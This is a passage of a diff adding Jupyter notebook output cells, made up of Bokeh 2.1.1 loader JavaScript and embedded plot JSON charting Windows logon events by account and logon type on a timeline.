+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(\"3281\");\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error() {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (var i = 0; i < css_urls.length; i++) {\n",
+       "      var url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n",
+       "\n",
+       "    for (var i = 0; i < js_urls.length; i++) {\n",
+       "      var url = js_urls[i];\n",
+       "      var element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error;\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    if (force === true) {\n",
+       "        display_loaded();\n",
+       "      }} else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(\"3281\")).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"3281\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\": \"kLr4fYcqcSpbuI95brIH3vnnYCquzzSxHPU6XGQCIkQRGJwhg0StNbj1eegrHs12\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\": \"xIGPmVtaOm+z0BqfSOMn4lOR6ciex448GIKG4eE61LsAvmGj48XcMQZtKcE/UXZe\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\": \"Dc9u1wF/0zApGIWoBbH77iWEHtdmkuYWG839Uzmv8y8yBLXebjO9ZnERsde5Ln/P\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\": \"cT9JaBz7GiRXdENrJLZNSC6eMNF3nh3fa5fTF51Svp+ukxPdwcU5kGXGPBgDCa2j\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.1.1.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.1.1.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"3281\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"1a256f3e-741c-4229-867d-e1987a135443\" data-root-id=\"3408\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "(function(root) {\n",
+       "  function embed_document(root) {\n",
+       "    \n",
+       "  var docs_json = {\"6109e4a9-035b-4f8e-88e5-5dedb0c15908\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"3288\"},{\"id\":\"3320\"}]},\"id\":\"3408\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"3327\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3329\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3418\",\"type\":\"Selection\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"3441\"},{\"id\":\"3442\"},{\"id\":\"3443\"},{\"id\":\"3444\"},{\"id\":\"3445\"},{\"id\":\"3446\"},{\"id\":\"3447\"},{\"id\":\"3448\"},{\"id\":\"3449\"},{\"id\":\"3450\"},{\"id\":\"3451\"},{\"id\":\"3452\"}]},\"id\":\"3332\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"3419\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"3364\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"3364\"}]},\"id\":\"3335\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3369\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"3428\"},{\"id\":\"3429\"},{\"id\":\"3430\"},{\"id\":\"3431\"},{\"id\":\"3432\"},{\"id\":\"3433\"},{\"id\":\"3434\"},{\"id\":\"3435\"},{\"id\":\"3436\"},{\"id\":\"3437\"},{\"id\":\"3438\"},{\"id\":\"3439\"}]},\"id\":\"3300\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"3337\"},\"ticker\":{\"id\":\"3332\"}},\"id\":\"3331\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"data\":{\"Account\":[\"Font Driver Host\\\\UMFD-0\",\"Font Driver Host\\\\UMFD-1\",\"Window Manager\\\\DWM-1\",\"Window Manager\\\\DWM-1\",\"Font Driver Host\\\\UMFD-2\",\"Window Manager\\\\DWM-2\",\"Window Manager\\\\DWM-2\"],\"LogonType\":[2,2,2,2,2,2,2],\"TimeGenerated\":{\"__ndarray__\":\"AECUaZ8zd0IAQJRpnzN3QgAwsWmfM3dCADCxaZ8zd0IA8I68nzN3QgCwkbyfM3dCALCRvJ8zd0I=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[7]},\"index\":[9,10,14,15,60,61,62],\"y_index\":[1,1,1,1,1,1,1]},\"selected\":{\"id\":\"3418\"},\"selection_policy\":{\"id\":\"3419\"}},\"id\":\"3283\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis\":{\"id\":\"3303\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"3306\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"3331\"},\"ticker\":null},\"id\":\"3334\",\"type\":\"Grid\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"3307\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"3402\"}},\"id\":\"3406\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"3286\"},\"glyph\":{\"id\":\"3360\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3361\"},\"selection_glyph\":null,\"view\":{\"id\":\"3363\"}},\"id\":\"3362\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3420\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3310\",\"type\":\"SaveTool\"},{\"attributes\":{\"data\":{\"x\":[1594405727000.0,1594405727000.0],\"y\":[0,5]},\"selected\":{\"id\":\"3426\"},\"selection_policy\":{\"id\":\"3427\"}},\"id\":\"3402\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3422\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3309\",\"type\":\"ResetTool\"},{\"attributes\":{\"label\":{\"value\":\"0\"},\"renderers\":[{\"id\":\"3374\"}]},\"id\":\"3397\",\"type\":\"LegendItem\"},{\"attributes\":{},\"id\":\"3423\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"3312\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"label\":{\"value\":\"2\"},\"renderers\":[{\"id\":\"3379\"}]},\"id\":\"3398\",\"type\":\"LegendItem\"},{\"attributes\":{\"data_source\":{\"id\":\"3286\"},\"glyph\":{\"id\":\"3392\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3393\"},\"selection_glyph\":null,\"view\":{\"id\":\"3395\"}},\"id\":\"3394\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"overlay\":{\"id\":\"3365\"},\"x_range\":{\"id\":\"3291\"},\"y_range\":null},\"id\":\"3364\",\"type\":\"RangeTool\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[0],\"TimeGenerated\":{\"__ndarray__\":\"AGB5aZ8zd0I=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[7],\"y_index\":[0]},\"selected\":{\"id\":\"3416\"},\"selection_policy\":{\"id\":\"3417\"}},\"id\":\"3282\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"3304\",\"type\":\"BasicTicker\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"3397\"},{\"id\":\"3398\"},{\"id\":\"3399\"},{\"id\":\"3400\"},{\"id\":\"3401\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"3396\",\"type\":\"Legend\"},{\"attributes\":{\"overlay\":{\"id\":\"3312\"}},\"id\":\"3308\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3340\",\"type\":\"Circle\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"line_width\":2,\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"3404\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"3286\"}},\"id\":\"3363\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3424\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"3425\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"formatter\":{\"id\":\"3412\"},\"ticker\":{\"id\":\"3304\"},\"visible\":false},\"id\":\"3303\",\"type\":\"LinearAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3341\",\"type\":\"Circle\"},{\"attributes\":{\"axis\":{\"id\":\"3299\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3302\",\"type\":\"Grid\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"3369\"},\"ticker\":{\"id\":\"3300\"}},\"id\":\"3299\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"below\":[{\"id\":\"3331\"},{\"id\":\"3336\"}],\"center\":[{\"id\":\"3334\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"3342\"},{\"id\":\"3347\"},{\"id\":\"3352\"},{\"id\":\"3357\"},{\"id\":\"3362\"}],\"title\":{\"id\":\"3321\"},\"toolbar\":{\"id\":\"3335\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"3323\"},\"x_scale\":{\"id\":\"3327\"},\"y_range\":{\"id\":\"3325\"},\"y_scale\":{\"id\":\"3329\"}},\"id\":\"3320\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"3282\"}},\"id\":\"3343\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":4.2,\"start\":-0.2},\"id\":\"3293\",\"type\":\"Range1d\"},{\"attributes\":{\"data_source\":{\"id\":\"3282\"},\"glyph\":{\"id\":\"3340\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3341\"},\"selection_glyph\":null,\"view\":{\"id\":\"3343\"}},\"id\":\"3342\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3412\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#79D151\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#79D151\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3392\",\"type\":\"Diamond\"},{\"attributes\":{\"source\":{\"id\":\"3286\"}},\"id\":\"3395\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"3426\",\"type\":\"Selection\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3441\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3285\"},\"glyph\":{\"id\":\"3387\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3388\"},\"selection_glyph\":null,\"view\":{\"id\":\"3390\"}},\"id\":\"3389\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3427\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3442\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"#404387\"},\"line_color\":{\"value\":\"#404387\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3345\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3444\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"3421\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3443\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"3283\"},\"glyph\":{\"id\":\"3345\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3346\"},\"selection_glyph\":null,\"view\":{\"id\":\"3348\"}},\"id\":\"3347\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"3448\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#404387\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#404387\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"3346\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"3449\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"3283\"}},\"id\":\"3348\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,